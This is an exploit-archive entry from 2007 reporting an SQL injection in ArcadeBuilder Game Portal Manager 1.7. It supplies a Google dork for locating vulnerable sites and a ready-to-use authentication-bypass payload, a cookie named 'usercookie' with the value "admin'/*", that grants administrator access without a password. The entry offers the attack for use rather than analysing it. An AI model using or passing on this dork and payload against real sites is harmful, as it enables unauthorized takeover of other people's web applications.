id: 1994
date: 06/30/2007
title: ArcadeBuilder Game Portal Manager 1.7 Remote SQL Injection Vuln
author: t0pP8uZz
cves: 

===============================================================
ArcadeBuilder Game Portal Manager 1.7 Remote SQL Injection Vuln
===============================================================


--==+================================================================================+==--
--==+               Game Portal Manager v1.7 SQL Injection Vulnerability             +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: http://www.arcadebuilder.net/
DORK: intext:"Powered by Arcade Builder"

DESCRIPTION: The browser cookie is sql injectable, allowing admin access without knowing the password.

EXPLOIT: Using your prefered cookie editor make a cookie with the following;

Name: usercookie
Content: admin'/*
Host: www.somesite.com
Path: /



#  0day.today [2023-03-23]  #